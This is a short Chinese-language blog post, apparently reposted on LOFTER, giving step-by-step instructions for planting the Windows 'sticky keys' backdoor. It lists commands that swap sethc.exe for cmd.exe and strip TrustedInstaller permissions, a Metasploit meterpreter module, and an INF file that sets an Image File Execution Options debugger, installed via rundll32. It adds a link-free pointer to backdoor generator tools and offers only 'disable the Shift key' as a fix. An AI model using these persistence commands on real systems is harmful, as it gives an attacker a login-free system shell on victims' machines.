shift后门建立与利用

后门建立方法一

把 c:\windows\system32\sethc.exe 和 c:\windows\system32\dllcache\sethc.exe 两个文件全部改成 baksethc.exe

move c:\windows\system32\sethc.exe c:\windows\system32\sethc-bak.exe

copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe

另外,如果修改或删除该文件时,默认失败,权限问题,可以属性安全里把其TrustedInstaller用户删除即可

后门建立方法二

使用msf,在meterpreter会话下执行以下命令

meterpreter > run post/windows/manage/sticky_keys


后门建立方法三

将下面的代码保存成inf文件 

[Version] 
Signature="$WINDOWS NT$" 
[DefaultInstall] 
AddReg=My_AddReg_Name
[My_AddReg_Name] 
HKLM,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution options\sethc.exe,debugger,0x00000000,c:\windows\system32\cmd.exe

然后上传到一个可以执行目录,然后执行以下命令

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\windows\temp\i.inf

后门建立方法四

百度搜索下载shift后门生成器,太多了,不赘述



效果演示

以后每次按下5次shift键就会弹出cmd框,即可以做后门又可以做快捷键




成功弹出命令窗口

修复方法

禁用shift键

评论
热度(4)
  1. jxldjsnredboy 转载了此文字
  2. redboy走过岁月...... 转载了此文字

© 走过岁月...... | Powered by LOFTER